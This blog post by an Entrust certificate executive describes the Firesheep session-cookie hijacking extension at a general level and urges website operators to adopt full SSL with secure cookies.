Firesheep wake-up call

Bruce Morton

Much has been written this past week about Firesheep. The bottom line: website operators must properly deploy SSL end-to-end security.

Firesheep is a Firefox extension written by Eric Butler and was presented by Butler and security consultant, Ian Gallagher, this past weekend at ToorCon hacker conference in San Diego. Firesheep takes advantage of a known security vulnerability related to non-secure session cookies. When connected to a public Wi-Fi, the program captures non-secure session cookies of other users of the Wi-Fi hotspot. When an unsuspecting user logs into an insecure website known by Firesheep, their name and photo are displayed. The Firesheep user can then click on the other user and they are instantly logged in as them.

Impacted websites include Amazon, Basecamp, bit.ly, Cisco, CNET, Dropbox, Enom, Evernote, Facebook, Flickr, Github, Google, HackerNews, Harvest, Windows Live, NY Times, Pivotal Tracker, Slicehost, tumblr, Twitter, WordPress, Yahoo, and Yelp. A plugin system allows a Firesheep user to add their own sites.

There are many suggested solutions to fight Firesheep. These solutions include:

  • don’t use public Wi-Fi
  • only use secure Wi-Fi
  • use a VPN service
  • force SSL by using a plug-in such as HTTPS-Everywhere or ForceTLS.
  • use an anonymizer such as Tor

These are partial or in some cases impractical solutions that may or may not work. Worst of all, they require the security challenged end-user to perform an action or make a trust decision.

The point of Firesheep is to put all web-site operators on notice that they need to wake-up and properly secure their web-sites with full end-to-end encryption using SSL. This practice includes the use of secure cookies.

For other best practices on SSL deployment, see SSL Deployment Mistakes.

Bruce Morton
Bruce Morton
Director, Certificate Technology & Standards

Bruce Morton has worked in the public key infrastructure and digital certificate industry for more than 15 years and has focused on SSL and other publicly trusted certificates since 2005. He has been an active member of the CA/Browser Forum that released guidelines for extended validation (EV) certificates and Baseline Requirements for SSL certificates. Bruce oversees the governance and compliance of Entrust’s publicly trusted PKI.


Add to the Conversation